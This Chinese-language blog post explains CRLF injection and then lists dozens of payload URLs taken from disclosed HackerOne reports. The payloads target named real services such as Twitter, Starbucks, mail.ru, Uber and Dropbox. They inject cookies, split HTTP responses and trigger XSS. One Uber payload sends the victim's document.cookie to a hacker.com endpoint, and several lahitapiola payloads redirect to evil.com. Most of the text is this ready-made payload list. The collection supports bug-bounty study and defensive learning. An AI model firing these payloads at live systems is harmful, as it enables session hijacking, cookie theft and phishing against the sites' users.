從 HackerOne 公開報告看 CRLF 注入的各種姿勢

整理一下 CRLF 注入的各種姿勢。

CRLF 是 Carriage-Return Line-Feed 的縮寫，意思是回車換行，即回車(CR, ASCII 13, \r, %0d) 和換行(LF, ASCII 10, \n, %0a)。

在 HTTP 報文中，狀態行和首部每行以 CRLF 結束，首部與主體之間由一空行分隔。CRLF 注入，即因爲 Web 應用沒有對用戶輸入做嚴格驗證，導致攻擊者可以通過注入 CRLF 字符實現 HTTP 響應拆分（HTTP Response Splitting）。

也就是說，CRLF 注入的實際效果是，在請求中添加 payload，響應中會出現注入的請求頭或值。

CRLF 注入的常見利用場景，是黑客可以通過這種手段製造能注入 Cookie 或特殊請求頭的釣魚鏈接，從而誘導用戶點擊實現攻擊。很多時候 CRLF 注入可以用來實現 XSS。

HackerOne 搜索 CRLF 披露報告 ...

整理披露報告的 payload 如下（點擊報告編號可打開對應報告）：

[1038594] https://www.epay.fas.gsa.gov/%0D%0ASet-Cookie:crlfinjection=crlfinjection

[446271] https://ads.twitter.com/subscriptions/mobile/landing?t=%0d%0aSet-Cookie:%20csrf_id=injection%3b

[191380] https://ton.twitter.com/1.1/ton/data/dm/x/%E5%98%8A%E5%98%8Dset-cookie%3A%20test%3Dtest%3B%20Domain%3D.twitter.com%3B%20Path%3D%2F%3B%20Expires%3DSat%2C%2015-Dec-2018%2009%3A45%3A55%20UTC

[52042] https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test

[192667]

Chrome PoC: http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E

FireFox PoC: http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E

[237357] https://vpn.bitstrips.com/__session_start__/%0aSet-Cookie:malicious_cookie1

[335599] https://mcs.mail.ru/auth/oidc/login?response_type=code&scope=userinfo&client_id=iaas.mail.ru&state=k1qOT59-VhrTIe177aP0PXOouig&redirect_uri=%0d%0aContent-Length:%200%0d%0a%0d%0a9%0d%0a%0d%0a%3Chtml%3E%3Cmarquee%3E%3Cb%3ETEST%3C/b%3E%3C/marquee%3E%3C/html%3E&nonce=ENHHnrgXnfxv0oBAGRKfaXSQOk5VMyA2MT9KCcZSlCM

[177624] https://team.badoo.com/%0d%0adata:text/html;text,%3Csvg%2fonload%3Dprompt%281%29%3E

[53843] https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=+++++++++++……set-cookie:a //此漏洞爲溢出漏洞，payload 因 + 部分過長有省略，完整 payload 可參看報告

[192749]

Chrome PoC: http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

FireFox PoC: http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

[217058] https://info.hacker.one/%0d%0a%09headername:%20headervalue

[231508] https://vpn.corp.cuvva.com/__session_start__/%0aSet-Cookie:NEW_COOKIE123

[145128] http://account-global.ubnt.com/%3f%0dSet-Cookie:crlf=injection%3bdomain=.ubnt.com%3b

[39181] http://www.vimeopro.com/crlftest%0dSet-Cookie:test=test;domain=.vimeopro.com //適用於 FireFox 以外的任何瀏覽器

[171473] https://bi.owox.com/%0d%0aMyheader:NewHeader

[234758] https://vpn.mixmax.com/__session_start__/%0aSet-Cookie:malicious_cookie1

[121489] https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28document.domain%29%3E&selectedLanguage=fi&selectedArea=

[183796]

https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28/Xssed_By_G3nt3lman/%29%3E&selectedLanguage=fi&selectedArea=

https://verkkopalvelu.lahitapiola.fi/a6/ajoneuvolaskin/MA/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28/Xssed_By_G3nt3lman/%29%3E&selectedLanguage=fi&selectedArea=

https://verkkopalvelu.lahitapiola.fi/a6/ajoneuvolaskin/MA/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza"'><%0D%0A+%0D%0A+<svg/onload=document.location='http://evil.com'>&selectedLanguage=fi&selectedArea=

https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza"'><%0D%0A+%0D%0A+<svg/onload=document.location='http://evil.com'>&selectedLanguage=fi&selectedArea=

[25275] http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io

[39261] https://monitor.sjc.dropbox.com/crlf%0dSet-Cookie:test=test;domain=.dropbox.com

[181939]

POST /tests/ HTTP/1.1
Host: qpt.mail.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 245

action=answer&test_id=149&qpt_question_url=http%3A%2F%2Fcard.krugdoveriya.mail.ru/%0aSet-Cookie=test=test%3bdomain=.mail.ru%3b&qpt_result_url=http%3A%2F%2Fcard.krugdoveriya.mail.ru%2Ftest.html&question_id=1406&qpt_test_state=1406%3A0&answer=6449

[114198] https://touch.lady.mail.ru/%0aSet-Cookie:csrftoken=x;domain=.mail.ru;

[154306] https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;

[67386]

http://my.mail.ru/crlftest%0dSet-Cookie:crlf=inj6;domain=.mail.ru;path=/;/
http://m.my.mail.ru/crlftest%0dSet-Cookie:crlf=inj4;domain=.mail.ru;path=/;/
https://mir.mail.ru/crlftest%0dSet-Cookie:crlf=inj3;domain=.mail.ru;path=/;/
https://blog.mail.ru/crlftest%0dSet-Cookie:crlf=inj5;domain=.mail.ru;path=/;/
https://blogs.mail.ru/crlftest%0dSet-Cookie:crlf=inj7;domain=.mail.ru;path=/;/
https://www.video.mail.ru/crlftest%0dSet-Cookie:crlf=inj2;domain=.mail.ru;path=/;/

[79552] http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;

[99268] https://otus.p.mail.ru/brat/ajax.cgi?action=downloadFile&collection=/&detailed=True&dir=True&extension=xml&filters=content::content_reference::omission::distortion::nonsense::inexact::unclear::content_cohesion::ThemeRheme::logic::content_pragmatics::register::use::&protocol=1&document=%0d%0aCRLF_Vulnerabled:true%00

[154275] http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;

[15492]

http://corp.mail.ru/%0dSet-Cookie:test=test;domain=.mail.ru;

http://corp.mail.ru/%0dSet-Cookie:csrftoken=x;domain=.mail.ru;

[332708] https://dl.beepcar.ru/qwerty%0ASet-Cookie:%20test=qwerty;domain=.beepcar.ru

[66257] https://s.mail.ru/test%0dSet-Cookie:crlf=injection;domain=.mail.ru;

[138332] http://torg.mail.ru//xxx%0ASet-Cookie:test=test;domain=.mail.ru

[36105] http://ishop.qiwi.com/test%0dSet-Cookie:test2=test;domain=.qiwi.com

[66386]

http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com;

https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com;

[140851] https://sales.mail.ru/media/%0ASet-Cookie:test=test?foo

[66391] https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com

[140851] https://sales.mail.ru/media/%0ASet-Cookie:test=test?foo

[125984]

https://developer.uber.com/dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Ealert("Injected js")%3C/script%3E%0d%0a%0d%0a<!- //這裏因簡書 BUG 刪除了一個 - ，本來末尾有兩個 -

https://developer.uber.com/dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Evar+img=new+Image();img.src="http://www.hacker.com/incoming.php?coo="%20+%20document.cookie;%3C/script%3E%0d%0a%0d%0a<!- //這裏因簡書 BUG 刪除了一個 - ，本來末尾有兩個 -

[13314] https://crowdin.khanacademy.org/page/in-context-localization?email=%0d%0a%20InjectedBy:BigBear

文章首發於 FreeBuf.COM